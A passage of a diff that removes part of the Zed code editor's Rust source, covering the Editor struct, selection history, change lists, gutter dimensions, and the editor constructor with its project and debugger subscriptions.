(kind.clone(), task)) - }) - } -} - -#[derive(Clone)] -struct ResolvedTasks { - templates: SmallVec<[(TaskSourceKind, ResolvedTask); 1]>, - position: Anchor, -} - -#[derive(Copy, Clone, Debug, PartialEq, PartialOrd)] -struct BufferOffset(usize); - -// Addons allow storing per-editor state in other crates (e.g. Vim) -pub trait Addon: 'static { - fn extend_key_context(&self, _: &mut KeyContext, _: &App) {} - - fn render_buffer_header_controls( - &self, - _: &ExcerptInfo, - _: &Window, - _: &App, - ) -> Option { - None - } - - fn to_any(&self) -> &dyn std::any::Any; - - fn to_any_mut(&mut self) -> Option<&mut dyn std::any::Any> { - None - } -} - -/// A set of caret positions, registered when the editor was edited. -pub struct ChangeList { - changes: Vec>, - /// Currently "selected" change. - position: Option, -} - -impl ChangeList { - pub fn new() -> Self { - Self { - changes: Vec::new(), - position: None, - } - } - - /// Moves to the next change in the list (based on the direction given) and returns the caret positions for the next change. - /// If reaches the end of the list in the direction, returns the corresponding change until called for a different direction. - pub fn next_change(&mut self, count: usize, direction: Direction) -> Option<&[Anchor]> { - if self.changes.is_empty() { - return None; - } - - let prev = self.position.unwrap_or(self.changes.len()); - let next = if direction == Direction::Prev { - prev.saturating_sub(count) - } else { - (prev + count).min(self.changes.len() - 1) - }; - self.position = Some(next); - self.changes.get(next).map(|anchors| anchors.as_slice()) - } - - /// Adds a new change to the list, resetting the change list position. - pub fn push_to_change_list(&mut self, pop_state: bool, new_positions: Vec) { - self.position.take(); - if pop_state { - self.changes.pop(); - } - self.changes.push(new_positions.clone()); - } - - pub fn last(&self) -> Option<&[Anchor]> { - self.changes.last().map(|anchors| anchors.as_slice()) - } -} - -#[derive(Clone)] -struct InlineBlamePopoverState { - scroll_handle: ScrollHandle, - commit_message: Option, - markdown: Entity, -} - -struct InlineBlamePopover { - position: gpui::Point, - show_task: Option>, - hide_task: Option>, - popover_bounds: Option>, - popover_state: InlineBlamePopoverState, -} - -/// Represents a breakpoint indicator that shows up when hovering over lines in the gutter that don't have -/// a breakpoint on them. -#[derive(Clone, Copy, Debug)] -struct PhantomBreakpointIndicator { - display_row: DisplayRow, - /// There's a small debounce between hovering over the line and showing the indicator. - /// We don't want to show the indicator when moving the mouse from editor to e.g. project panel. - is_active: bool, - collides_with_existing_breakpoint: bool, -} -/// Zed's primary implementation of text input, allowing users to edit a [`MultiBuffer`]. -/// -/// See the [module level documentation](self) for more information. -pub struct Editor { - focus_handle: FocusHandle, - last_focused_descendant: Option, - /// The text buffer being edited - buffer: Entity, - /// Map of how text in the buffer should be displayed. - /// Handles soft wraps, folds, fake inlay text insertions, etc. - pub display_map: Entity, - pub selections: SelectionsCollection, - pub scroll_manager: ScrollManager, - /// When inline assist editors are linked, they all render cursors because - /// typing enters text into each of them, even the ones that aren't focused. - pub(crate) show_cursor_when_unfocused: bool, - columnar_selection_tail: Option, - add_selections_state: Option, - select_next_state: Option, - select_prev_state: Option, - selection_history: SelectionHistory, - autoclose_regions: Vec, - snippet_stack: InvalidationStack, - select_syntax_node_history: SelectSyntaxNodeHistory, - ime_transaction: Option, - active_diagnostics: ActiveDiagnostic, - show_inline_diagnostics: bool, - inline_diagnostics_update: Task<()>, - inline_diagnostics_enabled: bool, - inline_diagnostics: Vec<(Anchor, InlineDiagnostic)>, - soft_wrap_mode_override: Option, - hard_wrap: Option, - - // TODO: make this a access method - pub project: Option>, - semantics_provider: Option>, - completion_provider: Option>, - collaboration_hub: Option>, - blink_manager: Entity, - show_cursor_names: bool, - hovered_cursors: HashMap>, - pub show_local_selections: bool, - mode: EditorMode, - show_breadcrumbs: bool, - show_gutter: bool, - show_scrollbars: bool, - disable_scrolling: bool, - disable_expand_excerpt_buttons: bool, - show_line_numbers: Option, - use_relative_line_numbers: Option, - show_git_diff_gutter: Option, - show_code_actions: Option, - show_runnables: Option, - show_breakpoints: Option, - show_wrap_guides: Option, - show_indent_guides: Option, - placeholder_text: Option>, - highlight_order: usize, - highlighted_rows: HashMap>, - background_highlights: TreeMap, - gutter_highlights: TreeMap, - scrollbar_marker_state: ScrollbarMarkerState, - active_indent_guides_state: ActiveIndentGuidesState, - nav_history: Option, - context_menu: RefCell>, - context_menu_options: Option, - mouse_context_menu: Option, - completion_tasks: Vec<(CompletionId, Task>)>, - inline_blame_popover: Option, - signature_help_state: SignatureHelpState, - auto_signature_help: Option, - find_all_references_task_sources: Vec, - next_completion_id: CompletionId, - available_code_actions: Option<(Location, Rc<[AvailableCodeAction]>)>, - code_actions_task: Option>>, - quick_selection_highlight_task: Option<(Range, Task<()>)>, - debounced_selection_highlight_task: Option<(Range, Task<()>)>, - document_highlights_task: Option>, - linked_editing_range_task: Option>>, - linked_edit_ranges: linked_editing_ranges::LinkedEditingRanges, - pending_rename: Option, - searchable: bool, - cursor_shape: CursorShape, - current_line_highlight: Option, - collapse_matches: bool, - autoindent_mode: Option, - workspace: Option<(WeakEntity, Option)>, - input_enabled: bool, - use_modal_editing: bool, - read_only: bool, - leader_peer_id: Option, - remote_id: Option, - pub hover_state: HoverState, - pending_mouse_down: Option>>>, - gutter_hovered: bool, - hovered_link_state: Option, - edit_prediction_provider: Option, - code_action_providers: Vec>, - active_inline_completion: Option, - /// Used to prevent flickering as the user types while the menu is open - stale_inline_completion_in_menu: Option, - edit_prediction_settings: EditPredictionSettings, - inline_completions_hidden_for_vim_mode: bool, - show_inline_completions_override: Option, - menu_inline_completions_policy: MenuInlineCompletionsPolicy, - edit_prediction_preview: EditPredictionPreview, - edit_prediction_indent_conflict: bool, - edit_prediction_requires_modifier_in_indent_conflict: bool, - inlay_hint_cache: InlayHintCache, - next_inlay_id: usize, - _subscriptions: Vec, - pixel_position_of_newest_cursor: Option>, - gutter_dimensions: GutterDimensions, - style: Option, - text_style_refinement: Option, - next_editor_action_id: EditorActionId, - editor_actions: - Rc)>>>>, - use_autoclose: bool, - use_auto_surround: bool, - auto_replace_emoji_shortcode: bool, - jsx_tag_auto_close_enabled_in_any_buffer: bool, - show_git_blame_gutter: bool, - show_git_blame_inline: bool, - show_git_blame_inline_delay_task: Option>, - git_blame_inline_enabled: bool, - render_diff_hunk_controls: RenderDiffHunkControlsFn, - serialize_dirty_buffers: bool, - show_selection_menu: Option, - blame: Option>, - blame_subscription: Option, - custom_context_menu: Option< - Box< - dyn 'static - + Fn( - &mut Self, - DisplayPoint, - &mut Window, - &mut Context, - ) -> Option>, - >, - >, - last_bounds: Option>, - last_position_map: Option>, - expect_bounds_change: Option>, - tasks: BTreeMap<(BufferId, BufferRow), RunnableTasks>, - tasks_update_task: Option>, - breakpoint_store: Option>, - gutter_breakpoint_indicator: (Option, Option>), - in_project_search: bool, - previous_search_ranges: Option]>>, - breadcrumb_header: Option, - focused_block: Option, - next_scroll_position: NextScrollCursorCenterTopBottom, - addons: HashMap>, - registered_buffers: HashMap, - load_diff_task: Option>>, - selection_mark_mode: bool, - toggle_fold_multiple_buffers: Task<()>, - _scroll_cursor_center_top_bottom_task: Task<()>, - serialize_selections: Task<()>, - serialize_folds: Task<()>, - mouse_cursor_hidden: bool, - hide_mouse_mode: HideMouseMode, - pub change_list: ChangeList, - inline_value_cache: InlineValueCache, -} - -#[derive(Copy, Clone, Debug, PartialEq, Eq, Default)] -enum NextScrollCursorCenterTopBottom { - #[default] - Center, - Top, - Bottom, -} - -impl NextScrollCursorCenterTopBottom { - fn next(&self) -> Self { - match self { - Self::Center => Self::Top, - Self::Top => Self::Bottom, - Self::Bottom => Self::Center, - } - } -} - -#[derive(Clone)] -pub struct EditorSnapshot { - pub mode: EditorMode, - show_gutter: bool, - show_line_numbers: Option, - show_git_diff_gutter: Option, - show_code_actions: Option, - show_runnables: Option, - show_breakpoints: Option, - git_blame_gutter_max_author_length: Option, - pub display_snapshot: DisplaySnapshot, - pub placeholder_text: Option>, - is_focused: bool, - scroll_anchor: ScrollAnchor, - ongoing_scroll: OngoingScroll, - current_line_highlight: CurrentLineHighlight, - gutter_hovered: bool, -} - -#[derive(Default, Debug, Clone, Copy)] -pub struct GutterDimensions { - pub left_padding: Pixels, - pub right_padding: Pixels, - pub width: Pixels, - pub margin: Pixels, - pub git_blame_entries_width: Option, -} - -impl GutterDimensions { - /// The full width of the space taken up by the gutter. - pub fn full_width(&self) -> Pixels { - self.margin + self.width - } - - /// The width of the space reserved for the fold indicators, - /// use alongside 'justify_end' and `gutter_width` to - /// right align content with the line numbers - pub fn fold_area_width(&self) -> Pixels { - self.margin + self.right_padding - } -} - -#[derive(Debug)] -pub struct RemoteSelection { - pub replica_id: ReplicaId, - pub selection: Selection, - pub cursor_shape: CursorShape, - pub peer_id: PeerId, - pub line_mode: bool, - pub participant_index: Option, - pub user_name: Option, -} - -#[derive(Clone, Debug)] -struct SelectionHistoryEntry { - selections: Arc<[Selection]>, - select_next_state: Option, - select_prev_state: Option, - add_selections_state: Option, -} - -enum SelectionHistoryMode { - Normal, - Undoing, - Redoing, -} - -#[derive(Clone, PartialEq, Eq, Hash)] -struct HoveredCursor { - replica_id: u16, - selection_id: usize, -} - -impl Default for SelectionHistoryMode { - fn default() -> Self { - Self::Normal - } -} - -#[derive(Default)] -struct SelectionHistory { - #[allow(clippy::type_complexity)] - selections_by_transaction: - HashMap]>, Option]>>)>, - mode: SelectionHistoryMode, - undo_stack: VecDeque, - redo_stack: VecDeque, -} - -impl SelectionHistory { - fn insert_transaction( - &mut self, - transaction_id: TransactionId, - selections: Arc<[Selection]>, - ) { - self.selections_by_transaction - .insert(transaction_id, (selections, None)); - } - - #[allow(clippy::type_complexity)] - fn transaction( - &self, - transaction_id: TransactionId, - ) -> Option<&(Arc<[Selection]>, Option]>>)> { - self.selections_by_transaction.get(&transaction_id) - } - - #[allow(clippy::type_complexity)] - fn transaction_mut( - &mut self, - transaction_id: TransactionId, - ) -> Option<&mut (Arc<[Selection]>, Option]>>)> { - self.selections_by_transaction.get_mut(&transaction_id) - } - - fn push(&mut self, entry: SelectionHistoryEntry) { - if !entry.selections.is_empty() { - match self.mode { - SelectionHistoryMode::Normal => { - self.push_undo(entry); - self.redo_stack.clear(); - } - SelectionHistoryMode::Undoing => self.push_redo(entry), - SelectionHistoryMode::Redoing => self.push_undo(entry), - } - } - } - - fn push_undo(&mut self, entry: SelectionHistoryEntry) { - if self - .undo_stack - .back() - .map_or(true, |e| e.selections != entry.selections) - { - self.undo_stack.push_back(entry); - if self.undo_stack.len() > MAX_SELECTION_HISTORY_LEN { - self.undo_stack.pop_front(); - } - } - } - - fn push_redo(&mut self, entry: SelectionHistoryEntry) { - if self - .redo_stack - .back() - .map_or(true, |e| e.selections != entry.selections) - { - self.redo_stack.push_back(entry); - if self.redo_stack.len() > MAX_SELECTION_HISTORY_LEN { - self.redo_stack.pop_front(); - } - } - } -} - -#[derive(Clone, Copy)] -pub struct RowHighlightOptions { - pub autoscroll: bool, - pub include_gutter: bool, -} - -impl Default for RowHighlightOptions { - fn default() -> Self { - Self { - autoscroll: Default::default(), - include_gutter: true, - } - } -} - -struct RowHighlight { - index: usize, - range: Range, - color: Hsla, - options: RowHighlightOptions, - type_id: TypeId, -} - -#[derive(Clone, Debug)] -struct AddSelectionsState { - above: bool, - stack: Vec, -} - -#[derive(Clone)] -struct SelectNextState { - query: AhoCorasick, - wordwise: bool, - done: bool, -} - -impl std::fmt::Debug for SelectNextState { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { - f.debug_struct(std::any::type_name::()) - .field("wordwise", &self.wordwise) - .field("done", &self.done) - .finish() - } -} - -#[derive(Debug)] -struct AutocloseRegion { - selection_id: usize, - range: Range, - pair: BracketPair, -} - -#[derive(Debug)] -struct SnippetState { - ranges: Vec>>, - active_index: usize, - choices: Vec>>, -} - -#[doc(hidden)] -pub struct RenameState { - pub range: Range, - pub old_name: Arc, - pub editor: Entity, - block_id: CustomBlockId, -} - -struct InvalidationStack(Vec); - -struct RegisteredInlineCompletionProvider { - provider: Arc, - _subscription: Subscription, -} - -#[derive(Debug, PartialEq, Eq)] -pub struct ActiveDiagnosticGroup { - pub active_range: Range, - pub active_message: String, - pub group_id: usize, - pub blocks: HashSet, -} - -#[derive(Debug, PartialEq, Eq)] - -pub(crate) enum ActiveDiagnostic { - None, - All, - Group(ActiveDiagnosticGroup), -} - -#[derive(Serialize, Deserialize, Clone, Debug)] -pub struct ClipboardSelection { - /// The number of bytes in this selection. - pub len: usize, - /// Whether this was a full-line selection. - pub is_entire_line: bool, - /// The indentation of the first line when this content was originally copied. - pub first_line_indent: u32, -} - -// selections, scroll behavior, was newest selection reversed -type SelectSyntaxNodeHistoryState = ( - Box<[Selection]>, - SelectSyntaxNodeScrollBehavior, - bool, -); - -#[derive(Default)] -struct SelectSyntaxNodeHistory { - stack: Vec, - // disable temporarily to allow changing selections without losing the stack - pub disable_clearing: bool, -} - -impl SelectSyntaxNodeHistory { - pub fn try_clear(&mut self) { - if !self.disable_clearing { - self.stack.clear(); - } - } - - pub fn push(&mut self, selection: SelectSyntaxNodeHistoryState) { - self.stack.push(selection); - } - - pub fn pop(&mut self) -> Option { - self.stack.pop() - } -} - -enum SelectSyntaxNodeScrollBehavior { - CursorTop, - FitSelection, - CursorBottom, -} - -#[derive(Debug)] -pub(crate) struct NavigationData { - cursor_anchor: Anchor, - cursor_position: Point, - scroll_anchor: ScrollAnchor, - scroll_top_row: u32, -} - -#[derive(Debug, Clone, Copy, PartialEq, Eq)] -pub enum GotoDefinitionKind { - Symbol, - Declaration, - Type, - Implementation, -} - -#[derive(Debug, Clone)] -enum InlayHintRefreshReason { - ModifiersChanged(bool), - Toggle(bool), - SettingsChange(InlayHintSettings), - NewLinesShown, - BufferEdited(HashSet>), - RefreshRequested, - ExcerptsRemoved(Vec), -} - -impl InlayHintRefreshReason { - fn description(&self) -> &'static str { - match self { - Self::ModifiersChanged(_) => "modifiers changed", - Self::Toggle(_) => "toggle", - Self::SettingsChange(_) => "settings change", - Self::NewLinesShown => "new lines shown", - Self::BufferEdited(_) => "buffer edited", - Self::RefreshRequested => "refresh requested", - Self::ExcerptsRemoved(_) => "excerpts removed", - } - } -} - -pub enum FormatTarget { - Buffers, - Ranges(Vec>), -} - -pub(crate) struct FocusedBlock { - id: BlockId, - focus_handle: WeakFocusHandle, -} - -#[derive(Clone)] -enum JumpData { - MultiBufferRow { - row: MultiBufferRow, - line_offset_from_top: u32, - }, - MultiBufferPoint { - excerpt_id: ExcerptId, - position: Point, - anchor: text::Anchor, - line_offset_from_top: u32, - }, -} - -pub enum MultibufferSelectionMode { - First, - All, -} - -#[derive(Clone, Copy, Debug, Default)] -pub struct RewrapOptions { - pub override_language_settings: bool, - pub preserve_existing_whitespace: bool, -} - -impl Editor { - pub fn single_line(window: &mut Window, cx: &mut Context) -> Self { - let buffer = cx.new(|cx| Buffer::local("", cx)); - let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); - Self::new( - EditorMode::SingleLine { auto_width: false }, - buffer, - None, - window, - cx, - ) - } - - pub fn multi_line(window: &mut Window, cx: &mut Context) -> Self { - let buffer = cx.new(|cx| Buffer::local("", cx)); - let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); - Self::new(EditorMode::full(), buffer, None, window, cx) - } - - pub fn auto_width(window: &mut Window, cx: &mut Context) -> Self { - let buffer = cx.new(|cx| Buffer::local("", cx)); - let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); - Self::new( - EditorMode::SingleLine { auto_width: true }, - buffer, - None, - window, - cx, - ) - } - - pub fn auto_height(max_lines: usize, window: &mut Window, cx: &mut Context) -> Self { - let buffer = cx.new(|cx| Buffer::local("", cx)); - let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); - Self::new( - EditorMode::AutoHeight { max_lines }, - buffer, - None, - window, - cx, - ) - } - - pub fn for_buffer( - buffer: Entity, - project: Option>, - window: &mut Window, - cx: &mut Context, - ) -> Self { - let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx)); - Self::new(EditorMode::full(), buffer, project, window, cx) - } - - pub fn for_multibuffer( - buffer: Entity, - project: Option>, - window: &mut Window, - cx: &mut Context, - ) -> Self { - Self::new(EditorMode::full(), buffer, project, window, cx) - } - - pub fn clone(&self, window: &mut Window, cx: &mut Context) -> Self { - let mut clone = Self::new( - self.mode, - self.buffer.clone(), - self.project.clone(), - window, - cx, - ); - self.display_map.update(cx, |display_map, cx| { - let snapshot = display_map.snapshot(cx); - clone.display_map.update(cx, |display_map, cx| { - display_map.set_state(&snapshot, cx); - }); - }); - clone.folds_did_change(cx); - clone.selections.clone_state(&self.selections); - clone.scroll_manager.clone_state(&self.scroll_manager); - clone.searchable = self.searchable; - clone.read_only = self.read_only; - clone - } - - pub fn new( - mode: EditorMode, - buffer: Entity, - project: Option>, - window: &mut Window, - cx: &mut Context, - ) -> Self { - let style = window.text_style(); - let font_size = style.font_size.to_pixels(window.rem_size()); - let editor = cx.entity().downgrade(); - let fold_placeholder = FoldPlaceholder { - constrain_width: true, - render: Arc::new(move |fold_id, fold_range, cx| { - let editor = editor.clone(); - div() - .id(fold_id) - .bg(cx.theme().colors().ghost_element_background) - .hover(|style| style.bg(cx.theme().colors().ghost_element_hover)) - .active(|style| style.bg(cx.theme().colors().ghost_element_active)) - .rounded_xs() - .size_full() - .cursor_pointer() - .child("⋯") - .on_mouse_down(MouseButton::Left, |_, _, cx| cx.stop_propagation()) - .on_click(move |_, _window, cx| { - editor - .update(cx, |editor, cx| { - editor.unfold_ranges( - &[fold_range.start..fold_range.end], - true, - false, - cx, - ); - cx.stop_propagation(); - }) - .ok(); - }) - .into_any() - }), - merge_adjacent: true, - ..Default::default() - }; - let display_map = cx.new(|cx| { - DisplayMap::new( - buffer.clone(), - style.font(), - font_size, - None, - FILE_HEADER_HEIGHT, - MULTI_BUFFER_EXCERPT_HEADER_HEIGHT, - fold_placeholder, - cx, - ) - }); - - let selections = SelectionsCollection::new(display_map.clone(), buffer.clone()); - - let blink_manager = cx.new(|cx| BlinkManager::new(CURSOR_BLINK_INTERVAL, cx)); - - let soft_wrap_mode_override = matches!(mode, EditorMode::SingleLine { .. }) - .then(|| language_settings::SoftWrap::None); - - let mut project_subscriptions = Vec::new(); - if mode.is_full() { - if let Some(project) = project.as_ref() { - project_subscriptions.push(cx.subscribe_in( - project, - window, - |editor, _, event, window, cx| match event { - project::Event::RefreshCodeLens => { - // we always query lens with actions, without storing them, always refreshing them - } - project::Event::RefreshInlayHints => { - editor - .refresh_inlay_hints(InlayHintRefreshReason::RefreshRequested, cx); - } - project::Event::SnippetEdit(id, snippet_edits) => { - if let Some(buffer) = editor.buffer.read(cx).buffer(*id) { - let focus_handle = editor.focus_handle(cx); - if focus_handle.is_focused(window) { - let snapshot = buffer.read(cx).snapshot(); - for (range, snippet) in snippet_edits { - let editor_range = - language::range_from_lsp(*range).to_offset(&snapshot); - editor - .insert_snippet( - &[editor_range], - snippet.clone(), - window, - cx, - ) - .ok(); - } - } - } - } - _ => {} - }, - )); - if let Some(task_inventory) = project - .read(cx) - .task_store() - .read(cx) - .task_inventory() - .cloned() - { - project_subscriptions.push(cx.observe_in( - &task_inventory, - window, - |editor, _, window, cx| { - editor.tasks_update_task = Some(editor.refresh_runnables(window, cx)); - }, - )); - }; - - project_subscriptions.push(cx.subscribe_in( - &project.read(cx).breakpoint_store(), - window, - |editor, _, event, window, cx| match event { - BreakpointStoreEvent::ClearDebugLines => { - editor.clear_row_highlights::(); - editor.refresh_inline_values(cx); - } - BreakpointStoreEvent::SetDebugLine => { - if editor.go_to_active_debug_line(window, cx) { - cx.stop_propagation(); - } - - editor.refresh_inline_values(cx); - } - _ => {} - }, - )); - } - } - - let buffer_snapshot = buffer.read(cx).snapshot(cx); - - let inlay_hint_settings = - inlay_hint_settings(selections.newest_anchor().head(), &buffer_snapshot, cx); - let focus_handle = cx.focus_handle(); - cx.on_focus(&focus_handle, window, Self::handle_focus) - .detach(); - cx.on_focus_in(&focus_handle, window, Self::handle_focus_in) - .detach(); - cx.on_focus_out(&focus_handle, window, Self::handle_focus_out) - .detach(); - cx.on_blur(&focus_handle, window, Self::handle_blur) - .detach(); - - let show_indent_guides = if matches!(mode, EditorMode::SingleLine { .. }) { - Some(false) - } else { - None - }; - - let breakpoint_store = match (mode, project.as_ref()) { - (EditorMode::Full { .. }, Some(project)) => Some(project.read(cx).breakpoint_store()), - _ => None, - }; - - let mut code_action_providers = Vec::new(); - let mut load_uncommitted_diff = None; - if let Some(project) = project.clone() { - load_uncommitted_diff = Some( - get_uncommitted_diff_for_buffer( - &project, - buffer.read(cx).all_buffers(), - buffer.clone(), - cx, - ) - .shared(), - ); - code_action_providers.push(Rc::new(project) as Rc<_>); - } - - let mut this = Self { - focus_handle, - show_cursor_when_unfocused: false, - last_focused_descendant: None, - buffer: buffer.clone(), - display_map: display_map.clone(), - selections, - scroll_manager: ScrollManager::new(cx), - columnar_selection_tail: None, - add_selections_state: None, - select_next_state: None, - select_prev_state: None, - selection_history: Default::default(), - autoclose_regions: Default::default(), - snippet_stack: Default::default(), - select_syntax_node_history: SelectSyntaxNodeHistory::default(), - ime_transaction: Default::default(), - active_diagnostics: ActiveDiagnostic::None, - show_inline_diagnostics: ProjectSettings::get_global(cx).diagnostics.inline.enabled, - inline_diagnostics_update: Task::ready(()), - inline_diagnostics: Vec::new(), - soft_wrap_mode_override, - hard_wrap: None, - completion_provider: project.clone().map(|project| Box::new(project) as _), - semantics_provider: project.clone().map(|project| Rc::new(project) as _), - collaboration_hub: project.clone().map(|project| Box::new(project) as _), - project, - blink_manager: blink_manager.clone(), - show_local_selections: true, - show_scrollbars: true, - disable_scrolling: false, - mode, - show_breadcrumbs: EditorSettings::get_global(cx).toolbar.breadcrumbs, - show_gutter: mode.is_full(), - show_line_numbers: None, - use_relative_line_numbers: None, - disable_expand_excerpt_buttons: false, - show_git_diff_gutter: None, - show_code_actions: None, - show_runnables: None, - show_breakpoints: None, - show_wrap_guides: None, - show_indent_guides, - placeholder_text: None, - highlight_order: 0, - highlighted_rows: HashMap::default(), - background_highlights: Default::default(), - gutter_highlights: TreeMap::default(), - scrollbar_marker_state: ScrollbarMarkerState::default(), - active_indent_guides_state: ActiveIndentGuidesState::default(), - nav_history: None, - context_menu: RefCell::new(None), - context_menu_options: None, - mouse_context_menu: None, - completion_tasks: Default::default(), - inline_blame_popover: Default::default(), - signature_help_state: SignatureHelpState::default(), - auto_signature_help: None, - find_all_references_task_sources: Vec::new(), - next_completion_id: 0, - next_inlay_id: 0, - code_action_providers, - available_code_actions: Default::default(), - code_actions_task: Default::default(), - quick_selection_highlight_task: Default::default(), - debounced_selection_highlight_task: Default::default(), - document_highlights_task: Default::default(), - linked_editing_range_task: Default::default(), - pending_rename: Default::default(), - searchable: true, - cursor_shape: EditorSettings::get_global(cx) - .cursor_shape - .unwrap_or_default(), - current_line_highlight: None, - autoindent_mode: Some(AutoindentMode::EachLine), - collapse_matches: false, - workspace: None, - input_enabled: true, - use_modal_editing: mode.is_full(), - read_only: false, - use_autoclose: true, - use_auto_surround: true, - auto_replace_emoji_shortcode: false, - jsx_tag_auto_close_enabled_in_any_buffer: false, - leader_peer_id: None, - remote_id: None, - hover_state: Default::default(), - pending_mouse_down: None, - hovered_link_state: Default::default(), - edit_prediction_provider: None, - active_inline_completion: None, - stale_inline_completion_in_menu: None, - edit_prediction_preview: EditPredictionPreview::Inactive { - released_too_fast: false, - }, - inline_diagnostics_enabled: mode.is_full(), - inline_value_cache: InlineValueCache::new(inlay_hint_settings.show_value_hints), - inlay_hint_cache: InlayHintCache::new(inlay_hint_settings), - - gutter_hovered: false, - pixel_position_of_newest_cursor: None, - last_bounds: None, - last_position_map: None, - expect_bounds_change: None, - gutter_dimensions: GutterDimensions::default(), - style: None, - show_cursor_names: false, - hovered_cursors: Default::default(), - next_editor_action_id: EditorActionId::default(), - editor_actions: Rc::default(), - inline_completions_hidden_for_vim_mode: false, - show_inline_completions_override: None, - menu_inline_completions_policy: MenuInlineCompletionsPolicy::ByProvider, - edit_prediction_settings: EditPredictionSettings::Disabled, - edit_prediction_indent_conflict: false, - edit_prediction_requires_modifier_in_indent_conflict: true, - custom_context_menu: None, - show_git_blame_gutter: false, - show_git_blame_inline: false, - show_selection_menu: None, - show_git_blame_inline_delay_task: None, - git_blame_inline_enabled: ProjectSettings::get_global(cx).git.inline_blame_enabled(), - render_diff_hunk_controls: Arc::new(render_diff_hunk_controls), - serialize_dirty_buffers: ProjectSettings::get_global(cx) - .session - .restore_unsaved_buffers, - blame: None, - blame_subscription: None, - tasks: Default::default(), - - breakpoint_store, - gutter_breakpoint_indicator: (None, None), - _subscriptions: vec![ - cx.observe(&buffer, Self::on_buffer_changed), - cx.subscribe_in(&buffer, window, Self::on_buffer_event), - cx.observe_in(&display_map, window, Self::on_display_map_changed), - cx.observe(&blink_manager, |_, _, cx| cx.notify()), - cx.observe_global_in::(window, Self::settings_changed), - observe_buffer_font_size_adjustment(cx, |_, cx| cx.notify()), - cx.observe_window_activation(window, |editor, window, cx| { - let active = window.is_window_active(); - editor.blink_manager.update(cx, |blink_manager, cx| { - if active { - blink_manager.enable(cx); - } else { - blink_manager.disable(cx); - } - }); - }), - ], - tasks_update_task: None, - linked_edit_ranges: Default::default(), - in_project_search: false, - previous_search_ranges: None, - breadcrumb_header: None, - focused_block: None, - next_scroll_position: NextScrollCursorCenterTopBottom::default(), - addons: HashMap::default(), - registered_buffers: HashMap::default(), - _scroll_cursor_center_top_bottom_task: Task::ready(()), - selection_mark_mode: false, - toggle_fold_multiple_buffers: Task::ready(()), - serialize_selections: Task::ready(()), - serialize_folds: Task::ready(()), - text_style_refinement: None, - load_diff_task: load_uncommitted_diff, - mouse_cursor_hidden: false, - hide_mouse_mode: EditorSettings::get_global(cx) - .hide_mouse - .unwrap_or_default(), - change_list: ChangeList::new(), - }; - if let Some(breakpoints) = this.breakpoint_store.as_ref() { - this._subscriptions - .push(cx.observe(breakpoints, |_, _, cx| { - cx.notify(); - })); - } - this.tasks_update_task = Some(this.refresh_runnables(window, cx)); - this._subscriptions.extend(project_subscriptions); - - this._subscriptions.push(cx.subscribe_in( - &cx.entity(), - window, - |editor, _, e: &EditorEvent, window, cx| match e { - EditorEvent::ScrollPositionChanged { local, .. } => { - if *local { - let new_anchor = editor.scroll_manager.anchor(); - let snapshot = editor.snapshot(window, cx); - editor.update_restoration_data(cx, move |data| { - data.scroll_position = ( - new_anchor.top_row(&snapshot.buffer_snapshot), - new_anchor.offset, - ); - }); - editor.hide_signature_help(cx, SignatureHelpHiddenBy::Escape); - editor.inline_blame_popover.take(); - } - } - EditorEvent::Edited { .. } => { - if !vim_enabled(cx) { - let (map, selections) = editor.selections.all_adjusted_display(cx); - let pop_state = editor - .change_list - .last() - .map(|previous| { - previous.len() == selections.len() - && previous.iter().enumerate().all(|(ix, p)| { - p.to_display_point(&map).row() - == selections[ix].head().row() - }) - }) - .unwrap_or(false); - let new_positions = selections - .into_iter() - .map(|s| map.display_point_to_anchor(s.head(), Bias::Left)) - .collect(); - editor - .change_list - .push_to_change_list(pop_state, new_positions); - } - } - _ => (), - }, - )); - - if let Some(dap_store) = this - .project - .as_ref() - .map(|project| project.read(cx).dap_store()) - { - let weak_editor = cx.weak_entity(); - - this._subscriptions - .push( - cx.observe_new::(move |_, _, cx| { - let session_entity = cx.entity(); - weak_editor - .update(cx, |editor, cx| { - editor._subscriptions.push( - cx.subscribe(&session_entity, Self::on_debug_session_event), - ); - }) - .ok(); - }), - ); - - for session in dap_store.read(cx).sessions().cloned().collect::>() { - this._subscriptions - .push(cx.subscribe(&session, Self::on_debug_session_event)); - } - } - - this.end_selection(window, cx); - this.scroll_manager.show_scrollbars(window, cx); - jsx_tag_auto_close::refresh_enabled_in_any_buffer(&mut this, &buffer, cx); - - if mode.is_full() { - let should_auto_hide_scrollbars = cx.should_auto_hide_scrollbars(); - cx.set_global(ScrollbarAutoHide(should_auto_hide_scrollbars)); - - if this.git_blame_inline_enabled { - this.git_blame_inline_enabled = true; - this.start_git_blame_inline(false, window, cx); - } - - this.go_to_active_debug_line(window, cx); - - if let Some(buffer) = buffer.read(cx).as_singleton() { - if let Some(project) = this.project.as_ref() { - let handle = project.update(cx, |project, cx| { - project.register_buffer_with_language_servers(&buffer, cx) - }); - this.registered_buffers - .insert(buffer.read(cx).remote_id(), handle); - } - } - } - - this.report_editor_event("Editor Opened", None, cx); - this - } - - pub fn deploy_mouse_context_menu( - &mut self, - position: gpui::Point, - context_menu: Entity, - window: &mut Window, - cx: &mut Context, - ) { - self.mouse_context_menu = Some(MouseContextMenu::new( - self, - crate::mouse_context_menu::MenuPosition::PinnedToScreen(position), - context_menu, - window, - cx, - )); - } - - pub fn mouse_menu_is_focused(&self, window: &Window, cx: &App) -> bool { - self.mouse_context_menu - .as_ref() - .is_some_and(|menu| menu.context_menu.focus_handle(cx).is_focused(window)) - } - - fn key_context(&self, window: &Window, cx: &App) -> KeyContext { - self.key_context_internal(self.has_active_inline_completion(), window, cx) - } - - fn key_context_internal( - &self, - has_active_edit_prediction: bool, - window: &Window, - cx: &App, - ) -> KeyContext { - let mut key_context = KeyContext::new_with_defaults(); - key_context.add("Editor"); - let mode = match self.mode { - EditorMode::SingleLine { .. } => "single_line", - EditorMode::AutoHeight { .. } => "auto_height", - EditorMode::Full { .. } => "full", - }; - - if EditorSettings::jupyter_enabled(cx) { - key_context.add("jupyter"); - } - - key_context.set("mode", mode); - if self.pending_rename.is_some() { - key_context.add("renaming"); - } - - match self.context_menu.borrow().as_ref() { - Some(CodeContextMenu::Completions(_)) => { - key_context.add("menu"); - key_context.add("showing_completions"); - } - Some(CodeContextMenu::CodeActions(_)) => { - key_context.add("menu"); - 